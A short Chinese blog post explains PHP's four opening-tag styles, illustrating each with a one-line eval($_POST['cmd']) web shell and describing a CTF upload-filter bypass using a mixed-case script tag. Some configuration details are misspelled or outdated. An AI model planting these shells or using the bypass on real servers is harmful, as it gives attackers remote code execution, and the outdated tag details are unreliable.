PHP的標識有哪些

PHP的標識有哪些？

PHP四種標記風格

1.XML風格

<?php
eval($_POST['cmd']); 
 ?>

php推薦使用的標記風格。

伺服器管理員無法禁用，所有伺服器上均可使用該風格。

2.指令碼風格

<script language="php">
    eval($_POST['cmd']);
</script>

預設開啟，無法禁用

筆者曾遇到過一CTF題目，要求上傳shell，但是卻對檔案內容做了過濾 ，<? 以及 php，替換為了空格。此種風格中，language的值，大小寫都可以，因此可以構造如下程式碼進行繞過

<script language="PhP">
    eval($_POST['cmd']);
</script>

3.簡短風格

<? 
    eval($_POST['cmd']);
?>

此種風格需要在組態檔php.ini中啟用short_open_tage選項

此種風格在許多環境中預設是不支援的

4.ASP風格

<% 
    eval($_POST['cmd']);
%>

此種風格需要在組態檔php.ini中啟用asp_tag選項

在預設情況下是禁用的

以上就是PHP的標識有哪些的詳細內容，更多請關注TW511.COM其它相關文章！